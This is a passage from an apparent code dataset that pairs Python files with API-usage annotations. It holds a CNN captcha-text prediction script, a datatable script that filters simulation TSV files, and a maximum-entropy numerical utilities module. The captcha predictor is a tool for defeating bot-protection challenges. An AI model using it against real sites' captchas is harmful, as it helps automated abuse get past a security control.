'sarpy.geometry.latlon.num', 'lat_lon_parser', (['value[:10]'], {}), '(value[:10])\n', (18753, 18765), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((18792, 18820), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['value[10:21]'], {}), '(value[10:21])\n', (18806, 18820), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((19004, 19023), 'numpy.isfinite', 'numpy.isfinite', (['arr'], {}), '(arr)\n', (19018, 19023), False, 'import numpy\n'), ((33217, 33229), 'numpy.log', 'numpy.log', (['(2)'], {}), '(2)\n', (33226, 33229), False, 'import numpy\n'), ((26085, 26098), 'numpy.log', 'numpy.log', (['(10)'], {}), '(10)\n', (26094, 26098), False, 'import numpy\n'), ((26673, 26686), 'numpy.log', 'numpy.log', (['(10)'], {}), '(10)\n', (26682, 26686), False, 'import numpy\n'), ((33373, 33385), 'numpy.log', 'numpy.log', (['(2)'], {}), '(2)\n', (33382, 33385), False, 'import numpy\n')]
|
# -*- coding: UTF-8 -*-
import numpy as np
import pandas as pd
import torch
import time
from torch.autograd import Variable
import captcha_setting
import my_dataset
from captcha_cnn_model import CNN
def main():
    print('Starting image prediction')
cnn = CNN()
cnn.eval()
cnn.load_state_dict(torch.load('model.pkl'))
print("加载神经网络训练的模型.")
result = []
predict_dataloader = my_dataset.get_predict_data_loader()
for i, (image_name, images, labels) in enumerate(predict_dataloader):
start = time.time()
image = images
vimage = Variable(image)
predict_label = cnn(vimage)
c0 = captcha_setting.ALL_CHAR_SET[np.argmax(predict_label[0, 0:captcha_setting.ALL_CHAR_SET_LEN].data.numpy())]
c1 = captcha_setting.ALL_CHAR_SET[np.argmax(
predict_label[0, captcha_setting.ALL_CHAR_SET_LEN:2 * captcha_setting.ALL_CHAR_SET_LEN].data.numpy())]
c2 = captcha_setting.ALL_CHAR_SET[np.argmax(
predict_label[0, 2 * captcha_setting.ALL_CHAR_SET_LEN:3 * captcha_setting.ALL_CHAR_SET_LEN].data.numpy())]
c3 = captcha_setting.ALL_CHAR_SET[np.argmax(
predict_label[0, 3 * captcha_setting.ALL_CHAR_SET_LEN:4 * captcha_setting.ALL_CHAR_SET_LEN].data.numpy())]
res = '%s%s%s%s' % (c0, c1, c2, c3)
cost = '%.2f ms' % ((time.time() - start) * 1000)
result.append([image_name[0],res, cost])
    print('Prediction results of the trained neural network:')
data = np.hstack([result])
res = pd.DataFrame(data, columns=['图片名称', '预测结果', '耗费时间'])
print(res)
if __name__ == '__main__':
main()
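# Note on the decoding in main() (explanatory, not part of the original script):
# the CNN emits one vector of length 4 * ALL_CHAR_SET_LEN per image; each
# ALL_CHAR_SET_LEN-wide slice is an independent classification head, and the argmax
# of each slice selects one character of the 4-character captcha. For example, if
# ALL_CHAR_SET_LEN were 36, the slices [0:36], [36:72], [72:108] and [108:144]
# would decode c0..c3 respectively.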
|
[
"pandas.DataFrame",
"torch.autograd.Variable",
"torch.load",
"numpy.hstack",
"time.time",
"captcha_cnn_model.CNN",
"my_dataset.get_predict_data_loader"
] |
[((246, 251), 'captcha_cnn_model.CNN', 'CNN', ([], {}), '()\n', (249, 251), False, 'from captcha_cnn_model import CNN\n'), ((383, 419), 'my_dataset.get_predict_data_loader', 'my_dataset.get_predict_data_loader', ([], {}), '()\n', (417, 419), False, 'import my_dataset\n'), ((1442, 1461), 'numpy.hstack', 'np.hstack', (['[result]'], {}), '([result])\n', (1451, 1461), True, 'import numpy as np\n'), ((1472, 1524), 'pandas.DataFrame', 'pd.DataFrame', (['data'], {'columns': "['图片名称', '预测结果', '耗费时间']"}), "(data, columns=['图片名称', '预测结果', '耗费时间'])\n", (1484, 1524), True, 'import pandas as pd\n'), ((291, 314), 'torch.load', 'torch.load', (['"""model.pkl"""'], {}), "('model.pkl')\n", (301, 314), False, 'import torch\n'), ((510, 521), 'time.time', 'time.time', ([], {}), '()\n', (519, 521), False, 'import time\n'), ((562, 577), 'torch.autograd.Variable', 'Variable', (['image'], {}), '(image)\n', (570, 577), False, 'from torch.autograd import Variable\n'), ((1320, 1331), 'time.time', 'time.time', ([], {}), '()\n', (1329, 1331), False, 'import time\n')]
|
#!/usr/bin/python3
# Script to shape the desired output to be processed (MMODES)
# the datatable way
# @author: <NAME>
# Creation: 09/06/2019
import os
import re
import numpy as np
import datatable as dt
from datatable import f
def log(cons, media):
'''
Writes information of consortium object to file
'''
logf = 'simulations.txt'
p = re.compile(r'#+ SIMULATION (\d+) #+')
if os.path.isfile(logf): # parse last simulation number
with open(logf) as l:
for line in l.readlines():
num_sim = p.search(line)
if num_sim:
head = " SIMULATION "+str(int(num_sim.group(1))+1)+" "
else:
head = " SIMULATION 1 "
lines = '{:{fill}{align}{width}}'.format(head,
fill = '#',
align = '^',
width = 30) + "\n"
lines += cons.__str__()
pers = ', '.join([per["PERTURBATION"] for per in media])
lines += "\nPERTURBATIONS: " + pers + "\n\n"
with open(logf, "a") as l:
l.write(lines)
return
def equidistant(df, n):
sample = np.linspace(df.nrows-1,1,n).astype('int')
sample.sort()
return df[sample, :]
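# Illustration of equidistant() (hypothetical frame): for a 10-row Frame and n=4,
# np.linspace(9, 1, 4) -> [9., 6.33, 3.67, 1.], which truncates to the row indices
# [9, 6, 3, 1]; after sorting, rows 1, 3, 6 and 9 are returned.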
def tsv_filter(medium = "", flux = "", txpers = {}, inplace = False, v = 0, equif = True, bin = False):
'''
Function that filters medium and fluxes TSV files based on perturbation times.
INPUTS -> medium: string, path to medium file;
              flux: string, path to flux file;
txpers: dictionary, time : perturbation;
inplace: bool, whether overwrite input paths (default False);
v: float, volume magnitude to obtain medium concentrations;
equif: bool, whether write an additional fluxes filtered file,
with 100 equidistant points (default True)
OUTPUT -> it returns None, writes 2(3) TSV files
'''
dfs = []
if not medium:
print("Medium parameter wasn't supplied, it won't be generated.")
else:
dfs.append([dt.fread(medium), medium, 0])
if v != 0:
for i in range(1,dfs[0][0].ncols): dfs[0][0][:,i] = dfs[0][0][:,f[i]/v]
if not flux:
print("Medium parameter wasn't supplied, it won't be generated.")
else:
dfs.append([dt.fread(flux), flux, 1])
    if not txpers:
        print("You must supply a txpers parameter. Exiting function...")
return
for log, path, n in dfs:
log[:,'Perturbations'] = "FALSE" # now last column (-1)
log[-1,-1] = "END"
if len(txpers) > 1:
for tp, per in txpers.items():
if tp == 0:
log[0,-1] = per
else:
# take last time that matches <= perturbation time
log[f.time == log[f.time < tp, f.time][-1,-1], -1] = per
# if per == 'START':
# log[0,-1] = 'START'
# else:
# # take last index that matches <= perturbation time
# log[f.time == log[f.time <= tp, f.time][-1,-1], -1] = per
else:
log[0, -1] = 'START'
if n != 0 and equif:
log_equif = equidistant(log,100) # take 100 equidistant rows
log_equif.to_csv(path[:-4] + '_equi' + '.tsv')
del(log_equif)
# TODO: I don't know how to implement a condroll with datatable
        # We aren't currently using it, anyway
log = log[f.Perturbations != "FALSE", :]
if inplace:
log.to_csv(path)
else:
log.to_csv(path[:-4] + '_filtered' + '.tsv')
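# Usage sketch (illustrative; the file names, volume and perturbation times below
# are hypothetical):
#
#     txpers = {0: 'START', 10.0: 'ADD_GLUCOSE'}
#     tsv_filter(medium='media.tsv', flux='fluxes.tsv', txpers=txpers,
#                inplace=False, v=0.05, equif=True)
#
# This would write media_filtered.tsv, fluxes_filtered.tsv and fluxes_equi.tsv
# alongside the input files.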
|
[
"os.path.isfile",
"datatable.fread",
"numpy.linspace",
"re.compile"
] |
[((359, 396), 're.compile', 're.compile', (['"""#+ SIMULATION (\\\\d+) #+"""'], {}), "('#+ SIMULATION (\\\\d+) #+')\n", (369, 396), False, 'import re\n'), ((404, 424), 'os.path.isfile', 'os.path.isfile', (['logf'], {}), '(logf)\n', (418, 424), False, 'import os\n'), ((1072, 1103), 'numpy.linspace', 'np.linspace', (['(df.nrows - 1)', '(1)', 'n'], {}), '(df.nrows - 1, 1, n)\n', (1083, 1103), True, 'import numpy as np\n'), ((1986, 2002), 'datatable.fread', 'dt.fread', (['medium'], {}), '(medium)\n', (1994, 2002), True, 'import datatable as dt\n'), ((2240, 2254), 'datatable.fread', 'dt.fread', (['flux'], {}), '(flux)\n', (2248, 2254), True, 'import datatable as dt\n')]
|
"""
Utility routines for the maximum entropy module.
Most of them are either Python replacements for the corresponding Fortran
routines or wrappers around matrices to allow the maxent module to
manipulate ndarrays, scipy sparse matrices, and PySparse matrices through a
common interface.
Perhaps the logsumexp() function belongs under the utils/ branch where other
modules can access it more easily.
Copyright: <NAME>, 2003-2006
License: BSD-style (see LICENSE.txt in main source directory)
"""
# Future imports must come before any code in 2.5
from __future__ import division
from __future__ import print_function
from builtins import range
__author__ = "<NAME>"
__version__ = '2.0'
import random
import math
import cmath
import numpy as np
#from numpy import log, exp, asarray, ndarray, empty
import scipy.sparse
try:
    from scipy.special import logsumexp
except ImportError:  # older SciPy versions kept logsumexp in scipy.misc
    from scipy.misc import logsumexp
def feature_sampler(vec_f, auxiliary_sampler):
"""
A generator function for tuples (F, log_q_xs, xs)
Parameters
----------
vec_f : function
Pass `vec_f` as a (vectorized) function that operates on a vector of
samples xs = {x1,...,xn} and returns a feature matrix (m x n), where m
is some number of feature components.
auxiliary_sampler : function
Pass `auxiliary_sampler` as a function that returns a tuple
(xs, log_q_xs) representing a sample to use for sampling (e.g.
importance sampling) on the sample space of the model.
xs : list, 1d ndarray, or 2d matrix (n x d)
We require len(xs) == n.
Yields
------
tuples (F, log_q_xs, xs)
F : matrix (m x n)
log_q_xs : as returned by auxiliary_sampler
xs : as returned by auxiliary_sampler
"""
while True:
xs, log_q_xs = auxiliary_sampler()
F = vec_f(xs) # compute feature matrix from points
yield F, log_q_xs, xs
def dictsample(freq, size=None, return_probs=None):
"""
Create a sample of the given size from the specified discrete distribution.
Parameters
----------
freq : a dictionary
A mapping from values x_j in the sample space to probabilities (or
unnormalized frequencies).
size : a NumPy size parameter (like a shape tuple)
Something passable to NumPy as a size argument to np.random.choice(...)
    return_probs : str or None, optional (default None)
None: don't return pmf values at each sample point
'prob': return pmf values at each sample point
'logprob': return log pmf values at each sample point
Returns
-------
Returns a sample of the given size from the keys of the given
dictionary `freq` with probabilities given according to the
values (normalized to 1). Optionally returns the probabilities
under the distribution of each observation.
Example
-------
>>> freq = {'a': 10, 'b': 15, 'c': 20}
    >>> dictsample(freq, size=10)
array([c, b, b, b, b, b, c, b, b, b], dtype=object)
"""
n = len(freq)
probs = np.fromiter(freq.values(), float)
probs /= probs.sum()
indices = np.random.choice(np.arange(n), size=size, p=probs)
labels = np.empty(n, dtype=object)
for i, label in enumerate(freq.keys()):
labels[i] = label
sample = labels[indices]
if return_probs is None:
return sample
sampleprobs = probs[indices]
if return_probs == 'prob':
return sample, sampleprobs
elif return_probs == 'logprob':
return sample, np.log(sampleprobs)
else:
raise ValueError('return_probs must be "prob", "logprob", or None')
def dictsampler(freq, size=None, return_probs=None):
"""
A generator of samples of the given size from the specified discrete
distribution.
Parameters
----------
freq : a dictionary
A mapping from values x_j in the sample space to probabilities (or
unnormalized frequencies).
size : a NumPy size parameter (like a shape tuple)
Something passable to NumPy as a size argument to np.random.choice(...)
    return_probs : str or None, optional (default None)
None: don't return pmf values at each sample point
'prob': return pmf values at each sample point
'logprob': return log pmf values at each sample point
Returns
-------
Returns a sample of the given size from the keys of the given
dictionary `freq` with probabilities given according to the
values (normalized to 1). Optionally returns the probabilities
under the distribution of each observation.
Example
-------
>>> freq = {'a': 10, 'b': 15, 'c': 20}
    >>> g = dictsampler(freq, size=10)
>>> next(g)
array([c, b, b, b, b, b, c, b, b, b], dtype=object)
"""
while True:
yield dictsample(freq, size=size, return_probs=return_probs)
def auxiliary_sampler_scipy(auxiliary, dimensions=1, n=10**5):
"""
Sample (once) from the given scipy.stats distribution
Parameters
----------
auxiliary : a scipy.stats distribution object (rv_frozen)
Returns
-------
sampler : function
sampler(), when called with no parameters, returns a tuple
(xs, log_q_xs), where:
xs : matrix (n x d): [x_1, ..., x_n]: a sample
log_q_xs: log pdf values under the auxiliary sampler for each x_j
"""
def sampler():
xs = auxiliary.rvs(size=(n, dimensions))
log_q_xs = np.log(auxiliary.pdf(xs.T)).sum(axis=0)
return (xs, log_q_xs)
return sampler
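# Minimal sketch combining the two helpers above (the auxiliary distribution and the
# two illustrative features are assumptions, not part of the module):
#
#     import scipy.stats
#     aux = auxiliary_sampler_scipy(scipy.stats.norm(0, 2), dimensions=1, n=10**4)
#     vec_f = lambda xs: np.vstack([xs.ravel(), xs.ravel() ** 2])   # 2 features
#     sampler = feature_sampler(vec_f, aux)
#     F, log_q_xs, xs = next(sampler)    # F has shape (2, 10**4)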
def _logsumexpcomplex(values):
"""A version of logsumexp that should work if the values passed are
complex-numbered, such as the output of robustarraylog(). So we
expect:
cmath.exp(logsumexpcomplex(robustarraylog(values))) ~= sum(values,axis=0)
except for a small rounding error in both real and imag components.
The output is complex. (To recover just the real component, use
A.real, where A is the complex return value.)
"""
if len(values) == 0:
return 0.0
iterator = iter(values)
# Get the first element
while True:
# Loop until we have a value greater than -inf
try:
b_i = next(iterator) + 0j
except StopIteration:
# empty
return float('-inf')
if b_i.real != float('-inf'):
break
# Now the rest
for a_i in iterator:
a_i += 0j
if b_i.real > a_i.real:
increment = robustlog(1.+cmath.exp(a_i - b_i))
# print "Increment is " + str(increment)
b_i = b_i + increment
else:
increment = robustlog(1.+cmath.exp(b_i - a_i))
# print "Increment is " + str(increment)
b_i = a_i + increment
return b_i
def logsumexp_naive(values):
"""For testing logsumexp(). Subject to numerical overflow for large
values (e.g. 720).
"""
s = 0.0
for x in values:
s += math.exp(x)
return math.log(s)
def robustlog(x):
"""Returns log(x) if x > 0, the complex log cmath.log(x) if x < 0,
or float('-inf') if x == 0.
"""
if x == 0.:
return float('-inf')
elif type(x) is complex or (type(x) is float and x < 0):
return cmath.log(x)
else:
return math.log(x)
def _robustarraylog(x):
""" An array version of robustlog. Operates on a real array x.
"""
    arraylog = np.empty(len(x), np.complex64)
for i in range(len(x)):
xi = x[i]
if xi > 0:
arraylog[i] = math.log(xi)
elif xi == 0.:
arraylog[i] = float('-inf')
else:
arraylog[i] = cmath.log(xi)
return arraylog
# def arrayexp(x):
# """
# OBSOLETE?
#
# Returns the elementwise antilog of the real array x.
#
# We try to exponentiate with np.exp() and, if that fails, with
# python's math.exp(). np.exp() is about 10 times faster but throws
# an OverflowError exception for numerical underflow (e.g. exp(-800),
# whereas python's math.exp() just returns zero, which is much more
# helpful.
# """
# try:
# ex = np.exp(x)
# except OverflowError:
# print("Warning: OverflowError using np.exp(). Using slower Python"\
# " routines instead!")
# ex = np.empty(len(x), float)
# for j in range(len(x)):
# ex[j] = math.exp(x[j])
# return ex
#
# def arrayexpcomplex(x):
# """
# OBSOLETE?
#
# Returns the elementwise antilog of the vector x.
#
# We try to exponentiate with np.exp() and, if that fails, with python's
# math.exp(). np.exp() is about 10 times faster but throws an
# OverflowError exception for numerical underflow (e.g. exp(-800),
# whereas python's math.exp() just returns zero, which is much more
# helpful.
#
# """
# try:
# ex = np.exp(x).real
# except OverflowError:
# ex = np.empty(len(x), float)
# try:
# for j in range(len(x)):
# ex[j] = math.exp(x[j])
# except TypeError:
# # Perhaps x[j] is complex. If so, try using the complex
# # exponential and returning the real part.
# for j in range(len(x)):
# ex[j] = cmath.exp(x[j]).real
# return ex
def sample_wr(population, k):
"""Chooses k random elements (with replacement) from a population.
(From the Python Cookbook).
"""
n = len(population)
_random, _int = random.random, int # speed hack
return [population[_int(_random() * n)] for i in range(k)]
def evaluate_feature_matrix(feature_functions,
xs,
vectorized=True,
format='csc_matrix',
dtype=float,
verbose=False):
"""Evaluate a (m x n) matrix of features `F` of the sample `xs` as:
F[i, :] = f_i(xs[:])
if xs is 1D, or as:
F[i, j] = f_i(xs[:, j])
if xs is 2D, for each feature function `f_i` in `feature_functions`.
Parameters
----------
feature_functions : a list of m feature functions f_i.
xs : either:
1. a (n x d) matrix representing n d-dimensional
observations xs[j, :] for j=1,...,n.
2. a 1d array or sequence (e.g list) of observations xs[j]
for j=1,...,n.
vectorized : bool (default True)
If True, the feature functions f_i are assumed to be vectorized;
then these will be passed all observations xs at once, in turn.
If False, the feature functions f_i will be evaluated one at a time.
format : str (default 'csc_matrix')
Options: 'ndarray', 'csc_matrix', 'csr_matrix', 'dok_matrix'.
If you have enough memory, it may be faster to create a dense
ndarray and then construct a e.g. CSC matrix from this.
Returns
-------
F : (m x n) matrix (in the given format: ndarray / csc_matrix / etc.)
Matrix of evaluated features.
"""
m = len(feature_functions)
if isinstance(xs, np.ndarray) and xs.ndim == 2:
n, d = xs.shape
if d == 1 and vectorized:
# xs may be a column vector, i.e. (n x 1) array.
# In this case, reshape it to a 1d array. This
# makes it easier to define functions that
# operate on only one variable (the usual case)
# given that sklearn's interface now forces 2D
# arrays X when calling .transform(X) and .fit(X).
xs = np.reshape(xs, n)
else:
n, d = len(xs), 1
if format in ('dok_matrix', 'csc_matrix', 'csr_matrix'):
F = scipy.sparse.dok_matrix((m, n), dtype=dtype)
elif format == 'ndarray':
F = np.empty((m, n), dtype=dtype)
else:
raise ValueError('matrix format not recognized')
for i, f_i in enumerate(feature_functions):
if verbose:
print('Computing feature {i} of {m} ...'.format(i=i, m=m))
if vectorized:
F[i::m, :] = f_i(xs)
else:
for j in range(n):
f_i_x = f_i(xs[j])
if f_i_x != 0:
F[i,j] = f_i_x
if format == 'csc_matrix':
return F.tocsc()
elif format == 'csr_matrix':
return F.tocsr()
else:
return F
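# Example of the evaluation above (illustrative values): two vectorized feature
# functions on five scalar observations, returned as a dense ndarray.
#
#     xs = np.array([0.0, 0.5, 1.0, 1.5, 2.0])
#     F = evaluate_feature_matrix([np.sin, np.cos], xs, format='ndarray')
#     # F.shape == (2, 5); F[0] == np.sin(xs) and F[1] == np.cos(xs)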
# def densefeatures(f, x):
# """Returns a dense array of non-zero evaluations of the vector
# functions fi in the list f at the point x.
# """
#
# return np.array([fi(x) for fi in f])
# def densefeaturematrix(f, sample, verbose=False):
# """Compute an (m x n) dense array of non-zero evaluations of the
# scalar functions fi in the list f at the points x_1,...,x_n in the
# list sample.
# """
#
# # Was: return np.array([[fi(x) for fi in f] for x in sample])
#
# m = len(f)
# n = len(sample)
#
# F = np.empty((m, n), float)
# for i in range(m):
# f_i = f[i]
# for j in range(n):
# x = sample[j]
# F[i,j] = f_i(x)
# return F
# def sparsefeatures(f, x, format='csc_matrix'):
# """Compute an mx1 sparse matrix of non-zero evaluations of the
# scalar functions f_1,...,f_m in the list f at the point x.
#
# """
# m = len(f)
# if format in ('dok_matrix', 'csc_matrix', 'csr_matrix'):
# sparsef = scipy.sparse.dok_matrix((m, 1))
# else:
# raise ValueError("sparse matrix format not recognized")
#
# for i in range(m):
# f_i_x = f[i](x)
# if f_i_x != 0:
# sparsef[i, 0] = f_i_x
#
# if format == 'csc_matrix':
# print("Converting to CSC matrix ...")
# return sparsef.tocsc()
# elif format == 'csr_matrix':
# print("Converting to CSR matrix ...")
# return sparsef.tocsr()
# else:
# return sparsef
# def sparsefeaturematrix(f, sample, format='csc_matrix', verbose=False):
# """Compute an (m x n) sparse matrix of non-zero evaluations of the
# scalar functions f_1,...,f_m in the list f at the points x_1,...,x_n
# in the sequence 'sample'.
#
# """
# m = len(f)
# n = len(sample)
# if format in ('dok_matrix', 'csc_matrix', 'csr_matrix'):
# sparseF = scipy.sparse.dok_matrix((m, n))
# else:
# raise ValueError("sparse matrix format not recognized")
#
# for i in range(m):
# if verbose:
# print('Computing feature {i} of {m}'.format(i=i, m=m))
# f_i = f[i]
# for j in range(n):
# x = sample[j]
# f_i_x = f_i(x)
# if f_i_x != 0:
# sparseF[i,j] = f_i_x
#
# if format == 'csc_matrix':
# return sparseF.tocsc()
# elif format == 'csr_matrix':
# return sparseF.tocsr()
# else:
# return sparseF
# def sparsefeaturematrix_vectorized(feature_functions, xs, format='csc_matrix'):
# """
# Evaluate a (m x n) matrix of features `F` of the sample `xs` as:
#
# F[i, j] = f_i(xs[:, j])
#
# Parameters
# ----------
# feature_functions : a list of feature functions f_i.
#
# xs : either:
# 1. a (d x n) matrix representing n d-dimensional
# observations xs[: ,j] for j=1,...,n.
# 2. a 1d array or sequence (e.g list) of observations xs[j]
# for j=1,...,n.
#
# The feature functions f_i are assumed to be vectorized. These will be
# passed all observations xs at once, in turn.
#
# Note: some samples may be more efficient / practical to compute
# features one sample observation at a time (e.g. generated). For these
# cases, use sparsefeaturematrix().
#
# Only pass sparse=True if you need the memory savings. If you want a
# sparse matrix but have enough memory, it may be faster to
# pass dense=True and then construct a CSC matrix from the dense NumPy
# array.
#
# """
# m = len(feature_functions)
#
# if isinstance(xs, np.ndarray) and xs.ndim == 2:
# d, n = xs.shape
# else:
# n = len(xs)
# if not sparse:
# F = np.empty((m, n), float)
# else:
# import scipy.sparse
# F = scipy.sparse.lil_matrix((m, n), dtype=float)
#
# for i, f_i in enumerate(feature_functions):
# F[i::m, :] = f_i(xs)
#
# if format == 'csc_matrix':
# return F.tocsc()
# elif format == 'csr_matrix':
# return F.tocsr()
# else:
# return F
def old_vec_feature_function(feature_functions, sparse=False):
"""
Create and return a vectorized function `features(xs)` that
evaluates an (n x m) matrix of features `F` of the sample `xs` as:
F[j, i] = f_i(xs[:, j])
Parameters
----------
feature_functions : a list of feature functions f_i.
`xs` will be passed to these functions as either:
1. an (n x d) matrix representing n d-dimensional
observations xs[j, :] for j=1,...,n.
2. a 1d array or sequence (e.g list) of observations xs[j]
for j=1,...,n.
The feature functions f_i are assumed to be vectorized. These will be
passed all observations xs at once, in turn.
Note: some samples may be more efficient / practical to compute
features of one sample observation at a time (e.g. generated).
Only pass sparse=True if you need the memory savings. If you want a
sparse matrix but have enough memory, it may be faster to
pass sparse=False and then construct a CSC matrix from the dense NumPy
array.
"""
if sparse:
import scipy.sparse
m = len(feature_functions)
def vectorized_features(xs):
if isinstance(xs, np.ndarray) and xs.ndim == 2:
n, d = xs.shape
else:
n = len(xs)
if not sparse:
F = np.empty((n, m), float)
else:
F = scipy.sparse.lil_matrix((n, m), dtype=float)
# Equivalent:
# for i, f_i in enumerate(feature_functions):
# for k in range(len(xs)):
# F[len(feature_functions)*k+i, :] = f_i(xs[k])
for i, f_i in enumerate(feature_functions):
F[:, i::m] = f_i(xs)
if not sparse:
return F
else:
return scipy.sparse.csc_matrix(F)
return vectorized_features
def dotprod(u,v):
"""
This is a wrapper around general dense or sparse dot products.
It is not necessary except as a common interface for supporting
ndarray, scipy spmatrix, and PySparse arrays.
Returns the dot product of the (1 x m) sparse array u with the
(m x 1) (dense) numpy array v.
"""
#print "Taking the dot product u.v, where"
#print "u has shape " + str(u.shape)
#print "v = " + str(v)
try:
dotprod = np.array([0.0]) # a 1x1 array. Required by spmatrix.
u.matvec(v, dotprod)
return dotprod[0] # extract the scalar
except AttributeError:
# Assume u is a dense array.
return np.dot(u,v)
def innerprod(A,v):
"""
This is a wrapper around general dense or sparse dot products.
It is not necessary except as a common interface for supporting
ndarray, scipy spmatrix, and PySparse arrays.
Returns the inner product of the (m x n) dense or sparse matrix A
with the n-element dense array v. This is a wrapper for A.dot(v) for
dense arrays and spmatrix objects, and for A.matvec(v, result) for
PySparse matrices.
"""
# We assume A is sparse.
(m, n) = A.shape
vshape = v.shape
try:
(p,) = vshape
except ValueError:
(p, q) = vshape
if n != p:
raise TypeError("matrix dimensions are incompatible")
if isinstance(v, np.ndarray):
try:
# See if A is sparse
A.matvec
except AttributeError:
# It looks like A is dense
return np.dot(A, v)
else:
# Assume A is sparse
if scipy.sparse.isspmatrix(A):
innerprod = A.matvec(v) # This returns a float32 type. Why???
return innerprod
else:
# Assume PySparse format
innerprod = np.empty(m, float)
A.matvec(v, innerprod)
return innerprod
elif scipy.sparse.isspmatrix(v):
return A * v
else:
raise TypeError("unsupported types for inner product")
def innerprodtranspose(A,v):
"""
This is a wrapper around general dense or sparse dot products.
It is not necessary except as a common interface for supporting
ndarray, scipy spmatrix, and PySparse arrays.
Computes A^T V, where A is a dense or sparse matrix and V is a numpy
array. If A is sparse, V must be a rank-1 array, not a matrix. This
function is efficient for large matrices A. This is a wrapper for
A.T.dot(v) for dense arrays and spmatrix objects, and for
A.matvec_transp(v, result) for pysparse matrices.
"""
(m, n) = A.shape
#pdb.set_trace()
if hasattr(A, 'matvec_transp'):
# A looks like a PySparse matrix
if len(v.shape) == 1:
innerprod = np.empty(n, float)
A.matvec_transp(v, innerprod)
else:
raise TypeError("innerprodtranspose(A,v) requires that v be "
"a vector (rank-1 dense array) if A is sparse.")
return innerprod
elif scipy.sparse.isspmatrix(A):
return (A.conj().transpose() * v).transpose()
else:
# Assume A is dense
if isinstance(v, np.ndarray):
# v is also dense
if len(v.shape) == 1:
# We can't transpose a rank-1 matrix into a row vector, so
# we reshape it.
vm = v.shape[0]
vcolumn = np.reshape(v, (1, vm))
x = np.dot(vcolumn, A)
return np.reshape(x, (n,))
else:
#(vm, vn) = v.shape
# Assume vm == m
x = np.dot(np.transpose(v), A)
return np.transpose(x)
else:
raise TypeError("unsupported types for inner product")
def rowmeans(A):
"""
This is a wrapper for general dense or sparse dot products.
It is only necessary as a common interface for supporting ndarray,
scipy spmatrix, and PySparse arrays.
Returns a dense (m x 1) vector representing the mean of the rows of A,
    which can be an (m x n) sparse or dense matrix.
>>> a = np.array([[1,2],[3,4]], float)
>>> rowmeans(a)
array([ 1.5, 3.5])
"""
if type(A) is np.ndarray:
return A.mean(1)
else:
# Assume it's sparse
try:
n = A.shape[1]
except AttributeError:
raise TypeError("rowmeans() only works with sparse and dense "
"arrays")
rowsum = innerprod(A, np.ones(n, float))
return rowsum / float(n)
def columnmeans(A):
"""
This is a wrapper for general dense or sparse dot products.
It is only necessary as a common interface for supporting ndarray,
scipy spmatrix, and PySparse arrays.
Returns a dense (1 x n) vector with the column averages of A, which can
be an (m x n) sparse or dense matrix.
>>> a = np.array([[1,2],[3,4]],'d')
>>> columnmeans(a)
array([ 2., 3.])
"""
if type(A) is np.ndarray:
return A.mean(0)
else:
# Assume it's sparse
try:
m = A.shape[0]
except AttributeError:
raise TypeError("columnmeans() only works with sparse and dense "
"arrays")
columnsum = innerprodtranspose(A, np.ones(m, float))
return columnsum / float(m)
def columnvariances(A):
"""
This is a wrapper for general dense or sparse dot products.
It is not necessary except as a common interface for supporting ndarray,
scipy spmatrix, and PySparse arrays.
Returns a dense (1 x n) vector with unbiased estimators for the column
variances for each column of the (m x n) sparse or dense matrix A. (The
normalization is by (m - 1).)
>>> a = np.array([[1,2], [3,4]], 'd')
>>> columnvariances(a)
array([ 2., 2.])
"""
if type(A) is np.ndarray:
return np.std(A,0)**2
else:
try:
m = A.shape[0]
except AttributeError:
raise TypeError("columnvariances() only works with sparse "
"and dense arrays")
means = columnmeans(A)
return columnmeans((A-means)**2) * (m/(m-1.0))
def flatten(a):
"""Flattens the sparse matrix or dense array/matrix 'a' into a
1-dimensional array
"""
if scipy.sparse.isspmatrix(a):
return a.A.flatten()
else:
return np.asarray(a).flatten()
class DivergenceError(Exception):
"""Exception raised if the entropy dual has no finite minimum.
"""
def __init__(self, message):
self.message = message
Exception.__init__(self)
def __str__(self):
return repr(self.message)
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
|
[
"math.exp",
"numpy.log",
"numpy.std",
"numpy.empty",
"numpy.asarray",
"cmath.log",
"numpy.transpose",
"numpy.ones",
"numpy.arange",
"numpy.array",
"numpy.reshape",
"cmath.exp",
"numpy.dot",
"math.log",
"builtins.range",
"doctest.testmod"
] |
[((3174, 3199), 'numpy.empty', 'np.empty', (['n'], {'dtype': 'object'}), '(n, dtype=object)\n', (3182, 3199), True, 'import numpy as np\n'), ((6991, 7002), 'math.log', 'math.log', (['s'], {}), '(s)\n', (6999, 7002), False, 'import math\n'), ((25128, 25145), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (25143, 25145), False, 'import doctest\n'), ((3126, 3138), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (3135, 3138), True, 'import numpy as np\n'), ((6968, 6979), 'math.exp', 'math.exp', (['x'], {}), '(x)\n', (6976, 6979), False, 'import math\n'), ((18779, 18794), 'numpy.array', 'np.array', (['[0.0]'], {}), '([0.0])\n', (18787, 18794), True, 'import numpy as np\n'), ((7255, 7267), 'cmath.log', 'cmath.log', (['x'], {}), '(x)\n', (7264, 7267), False, 'import cmath\n'), ((7293, 7304), 'math.log', 'math.log', (['x'], {}), '(x)\n', (7301, 7304), False, 'import math\n'), ((7541, 7553), 'math.log', 'math.log', (['xi'], {}), '(xi)\n', (7549, 7553), False, 'import math\n'), ((9588, 9596), 'builtins.range', 'range', (['k'], {}), '(k)\n', (9593, 9596), False, 'from builtins import range\n'), ((11566, 11583), 'numpy.reshape', 'np.reshape', (['xs', 'n'], {}), '(xs, n)\n', (11576, 11583), True, 'import numpy as np\n'), ((11781, 11810), 'numpy.empty', 'np.empty', (['(m, n)'], {'dtype': 'dtype'}), '((m, n), dtype=dtype)\n', (11789, 11810), True, 'import numpy as np\n'), ((12109, 12117), 'builtins.range', 'range', (['n'], {}), '(n)\n', (12114, 12117), False, 'from builtins import range\n'), ((17811, 17834), 'numpy.empty', 'np.empty', (['(n, m)', 'float'], {}), '((n, m), float)\n', (17819, 17834), True, 'import numpy as np\n'), ((19003, 19015), 'numpy.dot', 'np.dot', (['u', 'v'], {}), '(u, v)\n', (19009, 19015), True, 'import numpy as np\n'), ((21164, 21182), 'numpy.empty', 'np.empty', (['n', 'float'], {}), '(n, float)\n', (21172, 21182), True, 'import numpy as np\n'), ((22896, 22913), 'numpy.ones', 'np.ones', (['n', 'float'], {}), '(n, float)\n', (22903, 22913), True, 'import numpy as np\n'), ((23691, 23708), 'numpy.ones', 